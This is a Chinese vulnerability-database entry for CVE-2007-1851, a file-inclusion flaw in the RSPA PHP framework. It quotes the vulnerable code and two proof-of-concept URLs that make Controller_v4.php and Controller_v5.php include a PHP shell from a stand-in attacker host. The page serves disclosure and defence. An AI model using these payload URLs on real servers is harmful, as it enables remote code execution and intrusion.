Really Simple PHP和Ajax 多个目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112610 漏洞类型 路径遍历
发布时间 2007-04-02 更新时间 2007-04-03
CVE编号 CVE-2007-1851 CNNVD-ID CNNVD-200704-059
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/3641
https://www.securityfocus.com/bid/86372
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200704-059
|漏洞详情
ReallySimplePHP和Ajax(RSPA)2007-03-23中存在多个目录遍历漏洞。远程攻击者可以借助提交到(1)Controller_v4.php或(2)Controller_v5.php的__class参数中的..,包含和运行任意的本地文件。
|漏洞EXP
RSPA Remote File Inclusion

Really Simple PHP and Ajax (RSPA)
RSPA is a component based event driven ajax enabled framework for PHP4 and PHP 5. It is a combination of plane PHP class and HTML/Javascript.RSPA allows calling server side PHP functions from client javascript events. Visit http://rspa.sourceforge.net

Credit:
The information has been provided by Hamid Ebadi
The original article can be found at : http://www.bugtraq.ir

http://www.bugtraq.ir/articles/advisory/RSPA_File_Inclusion/6

Vulnerable Systems:
Version: rspa-2007-03-23

Description:
Input passed to the" __IncludeFilePHPClass ", " __ClassPath" and " __class" parameters in "rspa/framework/Controller_v5.php" and " rspa/framework/Controller_v4.php " is not properly verified before being used to include files. This can be exploited to execute arbitrary PHP code by including files from local or external resources.


read more about file inclusion in http://www.bugtraq.ir/articles

Vulnerable Code :
require_once("rspaconf.inc.php");

	$className = $_REQUEST['__class'];
	$methordName =  $_REQUEST['__methord'];

	// IncludeFile for PHP Class
		if ($_REQUEST['__IncludeFilePHPClass']){
			$filename = $_REQUEST['__IncludeFilePHPClass'];
			require_once ($filename);
		}

	// Parms
		if (isset($_REQUEST['__parameters'])){$parameter = getParms($_REQUEST['__parameters']);}else{$parameter="";}

	// ClassFile + ClassPath
		include ("../components/Form.class.php");
	 	if ($_REQUEST["__ClassPath"]=="null" || empty($_REQUEST["__ClassPath"])){
	 		$filename = $RSPA['class_folder'].$className.$RSPA['class_extension'];
	 	}else{
	 		$filename = $_REQUEST["__ClassPath"].$className.$RSPA['class_extension'];
	 	}
	 	require_once($filename);



POC exploit :
The following URL will cause remote file inclusion

http://[HOST]/rspa/framework/Controller_v5.php?__IncludeFilePHPClass=http://attacker/phpshell.txt/?
http://[HOST]/rspa/framework/Controller_v4.php?__ClassPath=http://attacker/phpshell.txt/?

[ http://www.bugtraq.ir/articles/advisory/RSPA_File_Inclusion/6 ]

# copyright : http://www.bugtraq.ir

# milw0rm.com [2007-04-02]
|受影响的产品
Really Simple Php And Ajax Really Simple Php And Ajax 2007-03-23
|参考资料

来源:MILW0RM
名称:3641
链接:http://www.milw0rm.com/exploits/3641
来源:VUPEN
名称:ADV-2007-1190
链接:http://www.frsirt.com/english/advisories/2007/1190
来源:MISC
链接:http://www.bugtraq.ir/articles/advisory/RSPA_File_Inclusion/6
来源:SECUNIA
名称:24671
链接:http://secunia.com/advisories/24671
来源:XF
名称:rspa-class-file-include(33357)
链接:http://xforce.iss.net/xforce/xfdb/33357